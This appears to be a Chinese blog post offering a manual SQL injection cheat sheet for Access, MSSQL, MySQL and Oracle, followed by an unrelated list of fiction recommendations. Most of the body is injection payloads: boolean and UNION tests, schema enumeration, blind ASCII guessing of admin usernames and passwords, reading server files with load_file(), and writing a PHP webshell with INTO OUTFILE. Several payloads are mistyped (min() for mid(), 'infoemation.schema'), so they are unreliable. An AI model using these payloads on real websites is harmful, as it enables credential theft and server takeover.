access、mssql、mysql、oracle数据库手工注入

Access注入：

*.mdb形式

判断注入点：

1. '号出现报错（页面显示不完整） ——容错性能

2. and 1=1 与的意思，1=1属于正常，插入后返回正常为存在注入；and 1=2同理插入不正确为存在注入

3. or 1=1 或or 1=2

4. and 1=12（id=-1）任何都会报错，不报错为存在注入

判断数据库类型

and exists (select * from msysobjects) >0返回无数据权限等错误及不报错为access数据库

and exists (select * from sysobjects)>0 判断sql server

判断数据表

and exists (select * from user)无报错说明存在admin表

判断字段

and exists (select admin from user)无报错说明存在admin表中的admin字段

判断字段长度

order by 10报错为不存在，不报错为存在

(id=-1)union select 1,2,3,4,5,6,7,8,9 from user会出现数字报错，例如出现3，5，可对3，和5上面输入username和password进行曝出用户名和密码

判断用户名密码长度

and (select len(username) from user)=5如果返回正常说明管理员账号的长度为5（大于小于同理）

and (select len(password) from user)=5如果返回正常说明管理员密码的长度为5（大于小于同理）

猜解管理员账号的第一个数据

判断ascii码判断

and (select top 1 asc(min(username,1,1)) from user)>100返回正常说明大于100，不正常说明不大于

and (select top 1 asc(min(username,1,1)) from user)>50返回正常说明大于50

and (select top 1 asc(min(username,1,1)) from user)=65返回正常说明等于65，则用户名的第一个ascii码为65

以此类推

猜解管理员账号的第二个数据

and (select top 1 asc(min(username,2,1)) from user)>100返回正常说明大于100，不正常说明不大于

猜解账号密码的第一个数据

and (select top 1 asc(min(password,1,1))from user)>100返回正常说明大于100，不正常说明不大于

偏移注入（猜解到表明，猜解不到列名）

用*号从最后一个字段数向前逐个删除来代替，知道显示正常为止，*代表了所有user表的字段

union select 1,2,3,4,5,* from user

偏移注入计算公式（研究学习）

order by 出的字段数减去*号的字段数，然而再用order by的字段数减去2倍刚才得出来的答案x（以x=4为例）

union select 1,2,3,4,a.id,b.id,* from (useras a inner join useras b on a.id = b.id)

第二种方法

1、后台登录文件源码表单里面的参数值

2、看网站地址链接上的规则

3、是否判断出对方使用的cms程序

Mssql注入（sqlserver）

端口1433，服务：sql server…

性能各方面比acess更好一点

xxx.mdf(后缀格式.mdf)

Mssql数据库权限

sa权限（数据库管理员权限）：数据库操作，文件管理，命令执行，注册表读取等system

db权限（dbo权限）：文件管理，数据库操作等users-administrators

public权限：数据库操作guest-users

注入语句

判断是否存在注入（方法一样）

and 1=1 and1=2

初步判断是否是mssql

and use>0

判断数据库系统

and (select count(*) from sysobject) > 0mssql

and (select count(*) from msysobject) >0 access

方法一：

判断数据库版本

and 1=(select @@version)

判断当前使用的数据库

and 1=(select db_name())

判断第一个用户数据库

and 1=( select top 1 name frommaster..sysdatabases where dbid>4)

判断下一个用户数据库

and 1=( select top 1 name from

master..sysdatabases where dbid>4 and name<> ‘第一个数据库名’)

以此类推获取其他数据库（后面继续跟and name <>xxx）

获取表名

判断第一张表admin

and 1=（select top 1 name from sysobjects where xtype=’u’）

判断第二张表

and 1=（select top 1 name from sysobjects where xtype=’u’ and name <> ‘admin’）

依次类推

获取表（user）的列名

获取第一个列名（username）

and 1=(select top 1 name from syscolumnswhere id =(select id from sysobjects where name = ‘user’))

判断第二列列名(password)

and 1=(select top 1 name from syscolumnswhere id =(select id from sysobjects where name = ‘user’) and name <>‘uname’)

获取表user中的数据

判断第一个用户名/密码等

and 1=(select top 1 username/password fromuser)

方法二：

判断表名

And (select Count(*) from [表名]) > 0

判断字段

and (select Count(字段名) from 表名) > 0

判断字段长度

and (select top 1 len(字段名) from 表名) > 0

判断字段的ascii值

and (select top 1 unicode(substring(字段名，1，1)) from 表名) >0

Mysql注入

判断注入

and 1=1 返回正常

and 1=2返回不正常存在注入点

判断字段长度

order by xx

order by x3 正常order by x4 不正常说明长度为x3

规定字段内报错

已知字段长度为10，则通过报错信息曝出可用的字段

id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10 from infoemation.schema.tables曝出3，5两个字符，在3，和5两个字符替换我们需要的信息语句

database():数据库名

version():数据库版本

user():数据库用户

@@version_compile_os:操作系统

group_concat(tables_name)数据表名（union查询最后+from information_schema.tables

where tables_schema=(数据库名的16进制)）

group_concat(column_name)数据表列名（union查询最后+from information_schema.tables

where tables_name=(数据表名的16进制)）

group_concat(username，0x5c，password)数据（union查询最后+from (数据表名)）

mysql4.0和5.0存在差别，不能用上述的方法进行进行曝(无information_schema.tables该数据表)。

读取原文件load_fiel()（通过绝对路径D:\\www\html\mysql\inc\sql.php）

and 1=2 union select 1,load_file(‘D:\\www\html\mysql\inc\sql.php’),3,4,5,6,7

and 1=2 union select 1,load_file(绝对路径的16进制),3,4,5,6,7

写入一句话马

and 1=2 union select 1,”

?>”,3,4,5,6,7 into outfile ‘绝对路径/1.php’

Oracle注入

判断是否存在注入

and 1=1 返回正常 and 1=2 返回错误可判断出存在注入

判断是否存在xxx表（以user为例）

and (select count(*) from user) <>0 报错说明不存在user表，未报错说明存在user表

判断是否存在xx列名

and (select count(xx) from user) <>0 报错说明不存在xx列，不报错说明存在xx列

利用ASCII码折半法猜解管理员账号和密码

(第一个数据（用户名或密码)的长度大于等于5)

and (select count(*) from user wherelength(name)>=5)=1

ascii码长度进行判断(ascii第一个字母对应的数字大小)具体ascii值

and (select count(*) from user where ascii(substr(username/password,1,1))>=10)=1（第一个ascii码）

and (select count(*) from user where ascii(substr(username/password,2,1))>=10)=1（第二个ascii码）

因时间关系，所以粗略总结到这，随后如果有时间整理会在和大家分享。

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 206,126评论 6赞 481
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 88,254评论 2赞 382
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 152,445评论 0赞 341
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 55,185评论 1赞 278
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 64,178评论 5赞 371
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 48,970评论 1赞 284
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 38,276评论 3赞 399
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 36,927评论 0赞 259
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 43,400评论 1赞 300
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 35,883评论 2赞 323
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 37,997评论 1赞 333
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 33,646评论 4赞 322
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 39,213评论 3赞 307
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 30,204评论 0赞 19
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 31,423评论 1赞 260
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 45,423评论 2赞 352
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 42,722评论 2赞 345

access、mssql、mysql、oracle数据库手工注入

推荐阅读更多精彩内容